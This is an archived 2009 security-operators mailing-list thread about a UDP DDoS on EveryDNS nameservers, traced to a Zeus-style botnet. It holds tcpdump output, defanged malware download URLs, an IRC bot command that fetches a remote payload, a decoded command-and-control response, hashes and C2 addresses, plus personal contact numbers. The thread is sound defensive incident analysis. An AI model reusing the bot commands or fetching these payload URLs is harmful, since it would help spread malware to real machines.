[nsp-sec] DDoS to EveryDNS nameserver IPs
Stephen Gill
gillsr at cymru.com
Wed Feb 4 20:53:04 EST 2009
Alas the attachment was stripped. Let's try that again:
https://www.cymru.com/nsp-sec/Owned/bigmap2.pdf
Please do NOT share outside of nsp-sec w/o permission.
Cheers,
-- steve
On 2/4/09 6:47 PM, "Stephen Gill" <gillsr at cymru.com> wrote:
> ----------- nsp-security Confidential --------
>
> Indeed, it seems there's quite a bit behind that IP, mostly Web based
> botnets of the Zeus flavor.
>
> hxxp://horobl.cn/dll/v.txt
> hxxp://rondolook.ru/loadero.exe
> hxxp://ontilop.ru/.../in.php
> hxxp://rondolook.ru/se2.exe
> hxxp://horobl.cn/dll/svch.txt
> hxxp://horobl.cn/dll/fo.txt
> hxxp://horobl.cn/dll/jud.txt
> hxxp://horobl.cn/dll/ger2.txt
> hxxp://rondolook.ru/Resultx.exe
> hxxp://horobl.cn/st/flag/testik/load.exe
> hxxp://rondolook.ru/ftp.exe
> hxxp://horobl.cn/dll/aad.txt
> hxxp://horobl.cn/dll/ser.txt
> hxxp://horobl.cn/dll/gh.txt
> hxxp://rondolook.ru/Builld.exe
> hxxp://rondolook.ru/l.exe
> hxxp://horobl.cn/ex/a.php
> hxxp://rondolook.ru/socks1.exe
> hxxp://horobl.cn/met/ge.txt
> hxxp://ontilop.ru/.../sploits/test.pdf
> hxxp://rondolook.ru/Babj.exe
> hxxp://ontilop.ru/.../e1.exe
> hxxp://rondolook.ru/ch.exe
> hxxp://rondolook.ru/loade.exe
> hxxp://horobl.cn/dll/top.txt
> hxxp://horobl.cn/dll/ger3.txt
> hxxp://rondolook.ru/asti1113_4.exe
> hxxp://horobl.cn/dll/us.txt
> hxxp://rondolook.ru/I20081109A-ch_blowfish-2k_20090105.exe
> hxxp://horobl.cn/dll/test.txt
> hxxp://horobl.cn/dll/hell.txt
> hxxp://goasi.cn/ex/a.php
> hxxp://rondolook.ru/loaderop.exe
> hxxp://horobl.cn/ex/0032.exe
> hxxp://rondolook.ru/pro.exe
> hxxp://horobl.cn/dll/ldr.txt
>
> I've attached a quick 1/2 level deep PDF snapshot of the Ips - hopefully
> puck will cooperate. If it doesn't I'll post a private URL. If interested
> we can pull out all the nodes for easier parsing. It's quite an elaborate
> network, and it gets really interesting if you go 1-2 more levels down.
>
> Graph compressed on whitespace to make it easier for smaller screens.
>
> Enjoy!
>
> Cheers,
> -- steve
>
> On 2/4/09 6:12 PM, "White, Gerard" <Gerard.White at aliant.ca> wrote:
>
>> Ladies:
>>
>> irc.zief.pl on TCP/80
>>
>> JOIN #.364
>> PRIVMSG :!get hxxp://horobl.cn/ex/a.php
>>
>> Name: horobl.cn
>> Address: 211.95.79.6 (Note Typo from Below???)
>>
>> HTTP/1.1 200 OK
>> Server: nginx
>>
>> MD5: dc9f67ae1d175386625c97fcf22c77ab
>> 11776 Bytes:
>> http://www.virustotal.com/analisis/34c33485e6a0f326bf75b15cd2ae404c
>>
>>
>> Which then triggers:
>> GET hxxp://mega/lgate.php?n=<ID>
>>
>> With a response of:
>> HTTP/1.1 200 OK
>> Server: nginx
>>
>> Content-Length: 44
>> MCBodHRwOi8vc2V0ZG9jLmNuL2Rsay9jYWUuZXhlIDE=
>>
>>
>> Which decodes to:
>> GET hxxp://setdoc.cn/dlk/cae.exe
>>
>> With a response of:
>> HTTP/1.1 200 OK
>> Date: Thu, 05 Feb 2009 08:39:36 GMT
>> Server: Apache/2.2.3 (CentOS)
>> Last-Modified: Tue, 03 Feb 2009 17:54:41 GMT
>> ETag: "154000f-1ae00-5d923a40"
>> Accept-Ranges: bytes
>> Content-Length: 110080
>> Connection: close
>> Content-Type: application/octet-stream
>>
>> MD5: deac9c705ed0f4e4c1d0f3c5bb9aa9c1
>> http://www.virustotal.com/analisis/2cc2c169bfea6ee56d3298fc853d2355
>>
>> Uses RSA crypto... drops a file "bogoa.exe"
>>
>> MD5: 0c524d62abc45d466bd812b091b5d7b0
>> http://www.virustotal.com/analisis/a9ae781773cba091485e3863c40c1ab4
>>
>>
>> GW
>> 855 - Bell Aliant
>>
>>
>> -----Original Message-----
>> From: nsp-security-bounces at puck.nether.net
>> [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Stephen Gill
>> Sent: Wednesday, February 04, 2009 7:49 PM
>> To: David Ulevitch; nsp-security at puck.nether.net
>> Subject: Re: [nsp-sec] DDoS to EveryDNS nameserver IPs
>>
>> ----------- nsp-security Confidential --------
>>
>> Supposedly these are the likely C&C candidates after a very helpful
>> individual took a brief glance at an infected machine:
>>
>> 9800 | 211.95.76.6 | UNICOM CHINA UNICOM
>> 23898 | 58.65.232.34 | HOSTFRESH-AS-AP HostFresh Internet
>>
>> I've fired up the malware on our Sandbox to see if it matches up. There
>> are
>> quie a few varieties of this file and almost 0 AV pick it up.
>>
>> You can also google for the most recent sample:
>>
>> SHA1 a5396141cab8b22d9d88b28a814089537dce366a
>> MD5 01c3346c241652f43aed8e2149881bfe
>>
>> Lawrence should have a seccheck now.
>>
>> PID 1252 204.184.73.43:1168 58.65.232.34:80 ESTABLISHED
>> winlogon.exe \??\C:\WINDOWS\SYSTEM32\winlogon.exe
>>
>> PID 1252 204.184.73.43:1175 211.95.79.6:80 ESTABLISHED
>> winlogon.exe \??\C:\WINDOWS\SYSTEM32\winlogon.exe
>>
>> -- steve
>>
>>
>> On 2/4/09 11:39 AM, "David Ulevitch" <david at opendns.com> wrote:
>>
>>> ----------- nsp-security Confidential --------
>>>
>>> I'm currently receiving a large DDoS to all my EveryDNS nameserver
>> IPs:
>>>
>>> ns1.everydns.net has address 208.76.56.56
>>> ns2.everydns.net has address 78.129.207.168
>>> ns3.everydns.net has address 71.6.202.220
>>> ns4.everydns.net has address 208.96.6.134
>>>
>>> The DDoS appears to all be UDP packets of length 1000 bytes.
>>>
>>> Here's what I mean:
>>>
>>> 01:39:20.107917 IP 115.186.96.138.58798 > 208.76.56.56.2194: UDP,
>>> length 1000
>>> 01:39:20.107959 IP 82.212.143.159.2270 > 208.76.56.56.4000: UDP,
>>> length 1000
>>> 01:39:20.107969 IP 187.10.195.160.60001 > 208.76.56.56.2105: UDP,
>>> length 1000
>>> 01:39:20.107986 IP 189.119.47.137.25664 > 208.76.56.56.908: UDP,
>>> length 1000
>>> 01:39:20.107991 IP 213.189.175.47.3732 > 208.76.56.56.3804: UDP,
>>> length 1000
>>> 01:39:20.108012 IP 202.41.85.244.22349 > 208.76.56.56.3119: UDP,
>>> length 1000
>>> 01:39:20.108089 IP 89.174.93.234.4675 > 208.76.56.56.3589: UDP, length
>>> 1000
>>>
>>> Anyone know what this looks like or anything I can do to stop it...
>>>
>>> 3 of the 4 nameservers are offline right now, and I'm working with
>>> some folks to bring up some more machines now. Ironically, I'm at the
>>> ICANN DNS meeting at GATech right now with a bunch of you. :-)
>>>
>>> Thanks,
>>> David Ulevitch
>>> 415 971 6916
>>>
>>>
>>> _______________________________________________
>>> nsp-security mailing list
>>> nsp-security at puck.nether.net
>>> https://puck.nether.net/mailman/listinfo/nsp-security
>>>
>>> Please do not Forward, CC, or BCC this E-mail outside of the
>> nsp-security
>>> community. Confidentiality is essential for effective Internet
>> security
>>> counter-measures.
>>> _______________________________________________
--
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 312 924 4023 | gillsr at cymru.com
More information about the nsp-security
mailing list